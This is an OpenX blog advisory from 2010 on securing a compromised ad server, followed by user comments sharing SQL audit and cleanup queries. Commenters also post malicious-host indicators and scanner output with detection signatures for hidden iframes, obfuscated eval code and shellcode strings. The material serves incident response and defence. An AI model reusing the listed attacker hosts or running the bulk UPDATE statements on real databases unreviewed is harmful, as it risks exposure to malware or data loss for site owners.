Tags: We have recently resolved a number of security vulnerabilities in the downloaded version of OpenX. The latest release is available here (or mirror) .
As with any open source downloaded software, it is important to update it when new releases come out to keep your system secure. Upgrading to the latest version of OpenX will close all known security issues.
After you download 2.8.7, you need to perform a full security audit to ensure that your system is secure.
First, check the append/prepend fields in the banners and zones table for any malicious code:
SELECT bannerid, append, prepend FROM banners WHERE append != '' OR prepend != '';
SELECT zoneid, append, prepend FROM zones WHERE append != '' OR prepend != '';
If you see anything suspicious on those fields, you should clear those values out.
Second, check that no unexpected admin users have been created, this query will list the details of all users with admin access in your system:
SELECT u.user_id, u.contact_name, u.email_address, u.username FROM users AS u, account_user_assoc AS aua WHERE u.user_id=aua.user_id AND aua.account_id = (SELECT value FROM application_variable WHERE name='admin_account_id');
Third, check for infected files on the filesystem: Installing the latest version of openx will restore all core files, but plugin files (which the installer copies up from the previous version), and files in the www/images folder should be double checked after the upgrade is complete.
In particular, be on the lookout for base64_decode and/or eval statements in your php files. From the bug notes of “Arbitrary code injected into cache file” at https://developer.openx.org/jira/browse/OX-5950, users have reported some specific php files, but the issue can occur on any of the php files.
Optional steps you can take to secure your system are:
- You should regularly change the passwords for all users in the system (especially administrator/manager users)
- Removing the /path/to/openx/www/admin/install.php and the install-plugins.php files.
- Locking down admin directory on Apache http://forum.openx.org/index.php?showtopic=503453491&st=15&p=205811&#entry205811
To be notified of any future security updates, please sign up for the OpenX Newsletter and add alerts@openx.org to your address book.
As always, please let us know of any potential security problems by emailing security@openx.org.
Hi, we have our account in openx, and since yesterday (16-sept-2010) our banners are still showing, even when they have been deactivated. Please do something!!!!
Comment by Santiago — September 17, 2010 @ 10:13 am
I upgraded and followed these instrucitons, but I’m still receiving the openx http://85.234.190.12/tds/in.cgi?default warning and thus I had to take my banners down again.
Is there a fix to this??!
Comment by harry — September 17, 2010 @ 2:02 pm
Do you have anyone there who answers the form to mail request? I have sent in several request over the last few days with no reply. I am needing assistance please with the upgrade. I also would like more information on other services you offer. Please advise. Unfortunately, I don’t have time to dig around the forums for answers on your products and services.
Comment by Duane — September 17, 2010 @ 9:10 pm
I have followed every step for upgrading from 2.8.1 to 2.8.7. I have uploaded installation files for the update on server, put them in mysite.com/openx1, and when I entered the address mysite.com/openx1 in opera, openx directed to login menu, not the install menu. Please help, I’ve wasted the whole day on this issue.
Comment by Alex — September 17, 2010 @ 9:21 pm
Same issue as Darco and Fixo and Mike with plugins. This is so frustrating. I tried to do clean install for verison 2.8.7 and again issue with plugins. So my update from 2.8.5 to 2.8.7 failed, new install failed, reason is in both cases in plugins and I don’t use any custom only plugins that are in by default so it seems that install is broken.
Comment by Vlad — September 18, 2010 @ 1:29 am
Santiago – There was a minor issue affecting the free community hosted servers which was preventing changes from being pushed out, this was resolved yesterday morning and was unrelated to the security issues.
harry – You need to identify and scrub the ad/zone which is serving up that malware, the SQL queries provided in this post check the banners/zones append and prepend fields, but you may also need to check the htmltemplate/htmlcache fields in the banners table for malware also.
Note that it is *very* important to follow all the steps in the upgrade instructions: http://www.openx.org/en/docs/upgrading-openx
Simply unpacking the openx-2.8.7.zip file over your existing installation and running through the upgrader is not enough to secure your system.
If the installer has problems installing the plugins, it should have presented you with a message detailing what issues were found, this information should also be present in the /path/to/openx/var/install.log file. You can also try to (re)install the default plugins directly via the UI (the .zip files for which can be found inside the openx-2.8.7.zip file in the etc/plugins folder)
Comment by Chris Nutting — September 19, 2010 @ 1:05 am
I found a huge list in field append with the malicious script .
SELECT bannerid, append, prepend FROM banners WHERE append != ” OR prepend != ”;
Can anybody suggest a mysql query to delete all script at once.
Deleting one by one will take ages.
Many thanks!
Comment by Lee — September 19, 2010 @ 11:49 am
Can you please explain step by step how to reinstall default plugins. I see them in etc/plugins, but I need instruction how to reinstall them. I had no problems to upgrade or installing openx versions until now. Clean install of openx 2.8.7 is failing with two plugins and upgrade from 2.8.5 is just removing them all. I would hate that my server get infected just because there is no instruction or manual how to install plugins when default installation fails. I tried and failed several times to upgrade or to install fresh openx 2.8.7. Also is it possible to get links for upgrade, install of openx that are current since there is always difference between readme file and current upgrade process. For example should a folder name be changed before or after running a wizard?. There is nothing about should the pluging folder be copied or will wizard copy those files. Should you use a full path from root folder in linux system or something else, since full path fails, when wizard asks for old installation of openx.
Thanks in advance
Comment by Vlad — September 20, 2010 @ 3:47 am
UPDATE banners SET append = ”, prepend = ” WHERE append != ” OR prepend != ”
Will empty the prepend and append fields where there is currently something in it.
Comment by Dan Mansfield — September 20, 2010 @ 2:12 pm
We had malware javascript injected directly into our most popular HTML ad itself, I would also suggest looking at:
select bannerid, htmltemplate from banners order by updated desc limit 10
or something thereabouts to check for recent changes to your banners themselves, not just the append/prepend into zones. This was inserted via a backdoor dropped into our www/images/layerstyles directory tree before we upgraded to 2.8.7, but not activated until after we upgraded, so make sure you follow the advice to check your images & cache directory for backdoors even if you’ve already upgraded. This tool: http://www.rfxn.com/projects/linux-malware-detect/ found the backdoor that was installed.
Comment by Jason — September 20, 2010 @ 4:34 pm
We’ve used OpenX for years. This latest security threat came out of nowhere and hit us hard. 72 hours later, we’re working hard to get relisted as a safe site with Google. It’s tanked our traffic today.
We found the solution though after upgrading, over 5,000 files were infected in the phpads_audit details column. Have your developers start their search there.
A sample search and results (x8 domains on our end, over 5,000 lines were removed:)
mysql> update phpads_audit set details=” where details like “%blamesllek%”;
Query OK, 1262 rows affected (0.36 sec)
Rows matched: 1262 Changed: 1262 Warnings: 0
Hope this helps anyone else dealing with this issue.
Comment by Kevin McNeese — September 20, 2010 @ 10:42 pm
If you are sure that all javascript code in append & prepend fields are bad, try using this MySql query:
1) SELECT bannerid, append, prepend FROM banners WHERE append != ” OR prepend != ”;
use this: UPDATE banners SET append=”, prepend=” WHERE append != ” OR prepend != ”;
2) SELECT zoneid, append, prepend FROM zones WHERE append != ” OR prepend != ”;
use this: UPDATE zones SET append=”, prepend=” WHERE append != ” OR prepend != ”;
Comment by adiva — September 21, 2010 @ 3:56 pm
I appear to have a fake user in the users table, although not as an admin, but a manager. I can’t seem to find them thru the web interface, so how do I delete them?
Thanks!
Comment by Kramer — September 22, 2010 @ 2:07 pm
Just a tip for anyone working on this issue. The above documentation will not fix your site in a step by step way. I am still working on fixing a site. Also, Google has listed us as an attack site, we cleaned up what we thought was all of the malware, and told google to review, and 2 days later still listed as an attack site.
We had malware in the databases ox_audit (“details” column, ox_banners (append, prepend columns), ox_zones (append, prepend columns), There were also malware entries in the tables named… ox_z_09be4005dcccc520
It seem like it is not very consistent on how it infects peoples sites. Maybe why it is such a good attack as it’s hard to clean up.
I have run iscanner, and linux malware detect v1.3.6. iscanner comes up with some issues, but I am not sure that they are serious as when I run the same scan on the original code of open-x it reports the same issues.
Here are results when I scan.
Starting iScanner 0.7 on [server] at (Thu Sep 23 20:44:31 2010)
Copyright (C) 2010 iSecur1ty
[*] Locating files (extentions: htm, html, php, js). please wait…
[*] Scanning [3245] files found. (db:0.2.0 – 22/Sep/2010)
[!] Scanned file: /home/sitename/www/site/www/admin/templates/install/tracker.html
Signature: [id:1.0] (<iframe.+?(?:visibility\s*:\s*hidden|display\s*:\s*none|style\s*=\s*['\"]?hidden|\s(?:width|height)\s*=\s*['\"]?[01][\'"\s]).+?)
Description: Hidden iframe tag detected.
[!] Scanned file: /home/sitename/www/ads.sitename.com/lib/smarty/plugins/function.mailto.php
Signature: [id:2.1] (<script.+?eval\s*\(\s*unescape.+?\).*?)
Description: Javascript ‘eval’ and ‘unescape’ functions detected, possible obfuscated malicious code.
[!] Scanned file: /home/sitename/www/ads.sitename.com/var/20100922_old.ads.sitename.com.conf.php
Signature: [id:4.0] ((?:shellcode|(?:LPORT|EXITFUNC|Encoder)=))
Description: Dangerous word detected, CHECK THE FILE!
[!] Scanned file: /home/sitename/www/ads.sitename.com/var/ads.sitename.com.conf.php
Signature: [id:4.0] ((?:shellcode|(?:LPORT|EXITFUNC|Encoder)=))
Description: Dangerous word detected, CHECK THE FILE!
[!] Scanned file: /home/sitename/www/ads.sitename.com/var/templates_compiled/%%F4^F43^F4358000%%tracker.html.php
Signature: [id:1.0] (<iframe.+?(?:visibility\s*:\s*hidden|display\s*:\s*none|style\s*=\s*['\"]?hidden|\s(?:width|height)\s*=\s*['\"]?[01][\'"\s]).+?)
Description: Hidden iframe tag detected.
[*] Scan finished in (8) seconds, [5] suspicious files found.
Please check “infected-20:44:31-23.Sep.log” for details.
Malware detect did not pick anything up when scanning on our site. Not sure if anyone has feedback on the above scan, but it would be helpful.
Comment by Wes — September 24, 2010 @ 2:53 am
This just got us too. Were were on 2.8.5 and have now been marked as an attack site (which is real pain to fix, since requesting a review from Google seems go into a black hole – simply no feedback).
We had about 30 backdoor scripts spread around the plugins folders, and all banners got appended with malicious code with iframes pointing to djbkzbk.co.cc This seems to have been orchestrated from Balerus, near Minsk, if the IP addresses are to be believed.
We have upgraded to 2.8.7, removed what we can, but are still searching the sites for other backdoor scripts that may have been allowed through.
One thing I am not sure about: the iframes in the “audit” table’s “details” column – do they also need to be removed, or are they just a history of what happened? So far as I can see, the only reason they are in the audit table is because we removed the JavaScript through the admin screens.
We did not get any new users or accounts created, so far as I can see.
This has shook me a little, because I thought OpenX was past this sort of thing. Looking through the code today I can see two major things that are just asking for this kind of trouble. Firstly read all input from ONE PLACE. We are a decade past PHP applications that should be sprinkled with GET and POST references. Just DON’T DO THAT. Filter all input through a single point where validation can be applied at source.
Secondly – database bind variables. Why has this escaped the OpenX developers for so long? The product is scattered with database queries with PHP variables in the the query strings. Again – PHP development got past this type of thing many years ago. Bind your data into your queries at the last moment – do it in one place that handles it all consistently and just once.
Please OpenX – I am annoyed, but only for your own sake. Fix those two things and you will remove 99% of all present and future vulnerabilities. Doing it the way you are now is just leaving the gate open is silly mistakes that let the hackers ride straight in. The functionality is great – but the back end code needs a little more thought *before* you roll out more features in the next version.
Comment by Jason Judge — September 24, 2010 @ 10:14 pm
[...] la solución del problema que data del 17 de Septiembre está aquí perfectamente documentada. Un ejemplo más de la eficacia de las herramientas OpenSource frente a las de código propietario [...]
Pingback by Troyanos, exploit's y malware en OpenX | Weblog personal de Enrique Castro — September 25, 2010 @ 3:03 pm
Upgraded to 2.8.7 a week ago and i already found js code in append & prepend fields! It looks like there’s no other option that changing product…
Comment by Peppos — September 26, 2010 @ 6:04 pm
[...] detectadas na passada semana graves vulnerabilidades no famoso sistema de gestão de publicidade [...]
Pingback by Blog Oficial da PTServidor » Vulnerabilidades de segurança no OpenX — September 26, 2010 @ 11:53 pm
This has happened to us about 3 times. We’ve upgraded and applied all the security measures but the hassle isn’t worth it. As another commenter mentioned, it seems there are backdoors in OpenX. We’re looking for alternative products.
Comment by Uno — September 28, 2010 @ 10:01 am
We have also had this happen three times now and are looking at Google’s DFP Small Business. This is just getting ridiculous.
OpenX told me their enterprise product is safe and secure. So, why can’t seem to make the community one safe?
Has anyone found that locking down their Apache server has prevented this from happening again? Does that work? Someone is getting in and creating new user accounts and adding appends to ads.
Comment by Steve — September 28, 2010 @ 11:37 am
Same problem here. Got listed as an attack site with Google. Few $1000 damage. Upgraded to 2.8.7. Cleaned the database, searched for malicious users.
Put the ads back on.
It took 5 hours and we’re blacklisted again. Database is infected again.
I’m sick and tired of this. There must be other vulnerabilities or backdoors.
Switching to another product this evening.
Comment by Richard — September 30, 2010 @ 12:58 pm
[...] OpenX users are also encouraged to review the “How to Secure your OpenX Installation” blog entry on how to further secure the OpenX [...]
Pingback by TechsRUs Blog » Foxit Releases Foxit Reader 4.2 — October 7, 2010 @ 3:03 pm
Real shame – I was totally happy until this… gonna look for a different banner server option now
Comment by Em See — October 10, 2010 @ 6:30 am
I really enjoyed OpenAds, then coming to OpenX, however their lack of focus on the Community Product is starting to show. This latest security exploit whereby they still have not solved the problem shows that they are no longer serious about their “Open Source” and “community” product.
Comment by Joel — October 12, 2010 @ 9:34 am
I found iframes also in “audit” table, prepend/apend columns.
Comment by Mihaela — October 15, 2010 @ 9:49 am
My tube site sogayporn.com was compromised, cleared the entire database, and did a clean 2.8.7 reinstall, and all is going great
Comment by sogayporn — October 19, 2010 @ 8:54 pm
This is the third time that I’m caught with this kind of problem, so they fix but don’t fix.
For those that don’t really use the append or prepend, why OpenX don’t just ofer a configuration to take that out of the code?
Does anyone know how to remove them on the code?
Comment by Ricardo — October 20, 2010 @ 3:21 pm